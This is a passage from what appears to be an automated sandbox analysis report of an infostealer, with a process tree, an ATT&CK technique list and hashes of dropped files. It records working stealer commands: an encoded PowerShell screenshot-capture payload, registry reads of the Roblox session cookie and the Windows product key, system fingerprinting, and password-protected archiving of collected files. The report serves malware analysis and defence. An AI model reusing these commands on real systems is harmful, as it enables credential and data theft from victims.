      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4112
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t4h2n0oe\t4h2n0oe.cmdline"
        5⤵
        
        PID:4844
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E82.tmp" "c:\Users\Admin\AppData\Local\Temp\t4h2n0oe\CSCD8820DED1CF5440D97D088838B17C88D.TMP"
        6⤵
        
        PID:2920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3596
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2072
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4332
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1696
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4484
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2672
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI42602\rar.exe a -r -hp"allah123" "C:\Users\Admin\AppData\Local\Temp\AixxX.zip" *"
    3⤵
    PID:3968
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5000
  - - C:\Users\Admin\AppData\Local\Temp\_MEI42602\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI42602\rar.exe a -r -hp"allah123" "C:\Users\Admin\AppData\Local\Temp\AixxX.zip" *
      4⤵
      Executes dropped EXE
      PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3784
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1372

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8740e7db6a0d290c198447b1f16d5281

SHA1
ab54460bb918f4af8a651317c8b53a8f6bfb70cd

SHA256
f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

SHA512
d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ad52a7d94b3a8a716af30ae86ca3aff7

SHA1
4c8cf2e3b4a4728aa35839518d30b63ba47cbdca

SHA256
9adbcf7cbb1266b190ca63761a020193777f8f3b2c8a7ed5864f21c952c590b5

SHA512
a09157d41fc3eed6b5e94f7a0d68d25894c6108be6ab850b5f4ad1fbeb538ca8d6163708d93908ab3e1126bcdb8334c49c43e4332a770373f2aa0820f29fb5b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9E82.tmp

Filesize
1KB

MD5
012783d999bb4cd089914c4a5cd8104a

SHA1
991cdd04ec2638d69ddbbd47a9459ae5c335e1a3

SHA256
f12b0439fe56687b86632c9f77e83b837a2a37b3829bddada59aa3942d71a1eb

SHA512
44d0f74a655c734f88589f09ebcb9341871330a7127e83151b7b27b9aa222e9b1aa8009028a853ac50f716734671068d02b5055cc6c672aff71da41c66df0d19

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_bz2.pyd

Filesize
48KB

MD5
58fc4c56f7f400de210e98ccb8fdc4b2

SHA1
12cb7ec39f3af0947000295f4b50cbd6e7436554

SHA256
dfc195ebb59dc5e365efd3853d72897b8838497e15c0977b6edb1eb347f13150

SHA512
ad0c6a9a5ca719d244117984a06cce8e59ed122855e4595df242df18509752429389c3a44a8ba0abc817d61e37f64638ccbdffc17238d4c38d2364f0a10e6bc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_ctypes.pyd

Filesize
62KB

MD5
79879c679a12fac03f472463bb8ceff7

SHA1
b530763123bd2c537313e5e41477b0adc0df3099

SHA256
8d1a21192112e13913cb77708c105034c5f251d64517017975af8e0c4999eba3

SHA512
ca19ddaefc9ab7c868dd82008a79ea457acd71722fec21c2371d51dcfdb99738e79eff9b1913a306dbedacb0540ca84a2ec31dc2267c7b559b6a98b390c5f3a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_decimal.pyd

Filesize
117KB

MD5
21d27c95493c701dff0206ff5f03941d

SHA1
f1f124d4b0e3092d28ba4ea4fe8cf601d5bd8600

SHA256
38ec7a3c2f368ffeb94524d7c66250c0d2dafe58121e93e54b17c114058ea877

SHA512
a5fbda904024cd097a86d6926e0d593b0f7e69e32df347a49677818c2f4cd7dc83e2bab7c2507428328248bd2f54b00f7b2a077c8a0aad2224071f8221cb9457

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_hashlib.pyd

Filesize
35KB

MD5
d6f123c4453230743adcc06211236bc0

SHA1
9f9ade18ac3e12bcc09757a3c4b5ee74cf5e794e

SHA256
7a904fa6618157c34e24aaac33fdf84035215d82c08eec6983c165a49d785dc9

SHA512
f5575d18a51207b4e9df5bb95277d4d03e3bb950c0e7b6c3dd2288645e26e1de8edcf634311c21a6bdc8c3378a71b531f840b8262db708726d36d15cb6d02441

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_lzma.pyd

Filesize
86KB

MD5
055eb9d91c42bb228a72bf5b7b77c0c8

SHA1
5659b4a819455cf024755a493db0952e1979a9cf

SHA256
de342275a648207bef9b9662c9829af222b160975ad8925cc5612cd0f182414e

SHA512
c5cba050f4b805a299f5d04ec0dce9b718a16bc335cac17f23e96519da0b9eaaf25ae0e9b29ef3dc56603bfe8317cdc1a67ee6464d84a562cf04bea52c31cfac

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_queue.pyd

Filesize
26KB

MD5
513dce65c09b3abc516687f99a6971d8

SHA1
8f744c6f79a23aa380d9e6289cb4504b0e69fe3b

SHA256
d4be41574c3e17792a25793e6f5bf171baeeb4255c08cb6a5cd7705a91e896fc

SHA512
621f9670541cac5684892ec92378c46ff5e1a3d065d2e081d27277f1e83d6c60510c46cab333c6ed0ff81a25a1bdc0046c7001d14b3f885e25019f9cdd550ed0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_socket.pyd

Filesize
44KB

MD5
14392d71dfe6d6bdc3ebcdbde3c4049c

SHA1
622479981e1bbc7dd13c1a852ae6b2b2aebea4d7

SHA256
a1e39e2386634069070903e2d9c2b51a42cb0d59c20b7be50ef95c89c268deb2

SHA512
0f6359f0adc99efad5a9833f2148b066b2c4baf564ba16090e04e2b4e3a380d6aff4c9e7aeaa2ba247f020f7bd97635fcdfe4e3b11a31c9c6ea64a4142333424

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_sqlite3.pyd

Filesize
58KB

MD5
8cd40257514a16060d5d882788855b55

SHA1
1fd1ed3e84869897a1fad9770faf1058ab17ccb9

SHA256
7d53df36ee9da2df36c2676cfaea84ee87e7e2a15ad8123f6abb48717c3bc891

SHA512
a700c3ce95ce1b3fd65a9f335c7c778643b2f7140920fe7ebf5d9be1089ba04d6c298bf28427ca774fbf412d7f9b77f45708a8a0729437f136232e72d6231c34

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_ssl.pyd

Filesize
66KB

MD5
7ef27cd65635dfba6076771b46c1b99f

SHA1
14cb35ce2898ed4e871703e3b882a057242c5d05

SHA256
6ef0ef892dc9ad68874e2743af7985590bb071e8afe3bbf8e716f3f4b10f19b4

SHA512
ac64a19d610448badfd784a55f3129d138e3b697cf2163d5ea5910d06a86d0ea48727485d97edba3c395407e2ccf8868e45dd6d69533405b606e5d9b41baadc0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\base_library.zip

Filesize
1.3MB

MD5
a9cbd0455b46c7d14194d1f18ca8719e

SHA1
e1b0c30bccd9583949c247854f617ac8a14cbac7

SHA256
df6c19637d239bfedc8cd13d20e0938c65e8fdf340622ff334db533f2d30fa19

SHA512
b92468e71490a8800e51410df7068dd8099e78c79a95666ecf274a9e9206359f049490b8f60b96081fafd872ec717e67020364bcfa972f26f0d77a959637e528

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\blank.aes

Filesize
115KB

MD5
ca43686360887851c1d09ba3cee4bd7f

SHA1
c4511a0ef745447f34102ecb8e94f1fdde83dc99

SHA256
d1bbcfab39e481623ec15031f4107556027f41c43ee5e5103f5db94f10497cd5

SHA512
0a82d8715e1891dcdbe555534135a15a282c0dc09735be2d83eb746f51c8e38939cf97ff0c1f270769634aec161c191e6d7df52ca38b50f081f05ebea5cfee33

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\libcrypto-3.dll

Filesize
1.6MB

MD5
8377fe5949527dd7be7b827cb1ffd324

SHA1
aa483a875cb06a86a371829372980d772fda2bf9

SHA256
88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d

SHA512
c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\libssl-3.dll

Filesize
221KB

MD5
b2e766f5cf6f9d4dcbe8537bc5bded2f

SHA1
331269521ce1ab76799e69e9ae1c3b565a838574

SHA256
3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4

SHA512
5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\python313.dll

Filesize
1.8MB

MD5
6ef5d2f77064df6f2f47af7ee4d44f0f

SHA1
0003946454b107874aa31839d41edcda1c77b0af

SHA256
ab7c640f044d2eb7f4f0a4dfe5e719dfd9e5fcd769943233f5cece436870e367

SHA512
1662cc02635d63b8114b41d11ec30a2af4b0b60209196aac937c2a608588fee47c6e93163ea6bf958246c32759ac5c82a712ea3d690e796e2070ac0ff9104266

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\select.pyd

Filesize
25KB

MD5
fb70aece725218d4cba9ba9bbb779ccc

SHA1
bb251c1756e5bf228c7b60daea1e3b6e3f9f0ff5

SHA256
9d440a1b8a6a43cfaa83b9bc5c66a9a341893a285e02d25a36c4781f289c8617

SHA512
63e6db638911966a86f423da8e539fc4ab7eb7b3fb76c30c16c582ce550f922ad78d1a77fa0605caffa524e480969659bf98176f19d5effd1fc143b1b13bbaaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\sqlite3.dll

Filesize
643KB

MD5
21aea45d065ecfa10ab8232f15ac78cf

SHA1
6a754eb690ff3c7648dae32e323b3b9589a07af2

SHA256
a1a694b201976ea57d4376ae673daa21deb91f1bf799303b3a0c58455d5126e7

SHA512
d5c9dc37b509a3eafa1e7e6d78a4c1e12b5925b5340b09bee06c174d967977264c9eb45f146abed1b1fc8aa7c48f1e0d70d25786ed46849f5e7cc1c5d07ac536

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42602\unicodedata.pyd

Filesize
260KB

MD5
b2712b0dd79a9dafe60aa80265aa24c3

SHA1
347e5ad4629af4884959258e3893fde92eb3c97e

SHA256
b271bd656e045c1d130f171980ed34032ac7a281b8b5b6ac88e57dce12e7727a

SHA512
4dc7bd1c148a470a3b17fa0b936e3f5f68429d83d552f80051b0b88818aa88efc3fe41a2342713b7f0f2d701a080fb9d8ac4ff9be5782a6a0e81bd759f030922

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vakgn2dv.iya.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\t4h2n0oe\t4h2n0oe.dll

Filesize
4KB

MD5
536314136f7ba0d3aa7fb1e25e4d3bf2

SHA1
a85353a7b573ae9b0161a7e5be8e8cc05dd90346

SHA256
2470fc0d95d7182d93e8bce5c2fffd9c35b1b55f3ecaad9c20bef27d8665dee6

SHA512
afe131cc43167cd307136d418d18b9088c41ef3369fd5192601ae7e6c88c09b5ba107bf401995b1d9fa4bca20aeb4eb4682f6f1292e3a4df1b8bf202a9035727

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‏ \Common Files\Desktop\DenyHide.mp4

Filesize
763KB

MD5
e64ff7caa361906f1d446f6fac0a37ff

SHA1
37e6bd09f7416d5bb0f9dc1bfc4877b96ca9fed6

SHA256
140de89ff7cd2fe4915c8cb25e0dbf2a9976ae25d5a6062e49dca31a40bc35f8

SHA512
f0d7d49be95c64b65956f71d0434d6cbf1722b41a3f48333441c294573a2e15136c462072f16dcd4f728b4676e0eddec054dd7b1e0df2daef29486b3747a65c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‏ \Common Files\Desktop\GroupHide.csv

Filesize
487KB

MD5
a6bec66f6bafcae99e3d1b2fa9fdf818

SHA1
570f401123eb1f0e708f552aecb4364cce41c511

SHA256
793f82a232cb947789c25235f1667b7b9f39bc7b6758b6ef416ad535d6f73498

SHA512
6310184316adf94870542c523cfed1735279bb26f3200efcb135e03bfc5872da28d7b62aff1fe21d4ee6b0f116fd75331fccb4e5404f98ab5a07b62af074bfb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‏ \Common Files\Desktop\SendClose.xlsx

Filesize
14KB

MD5
096b576f86c1040bb44174a7a36b3a44

SHA1
43fa72c5e93c426fe80712617c6675a2d8d66801

SHA256
ce000889bcf1a190eeef65e4bcd416dcebdd364fd93addbe15f4dc80d6df586c

SHA512
cb0dbb2915b530d2248f68198689a9f2cedec46cb229852d812a5fa1a0842b5f6e0f251309232bc8b701fbd3d019b5d3bb13d28c740c338567f1674257413100

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‏ \Common Files\Desktop\WriteCopy.xlsx

Filesize
13KB

MD5
c10be1166be08e83b181452e2c5a7ea2

SHA1
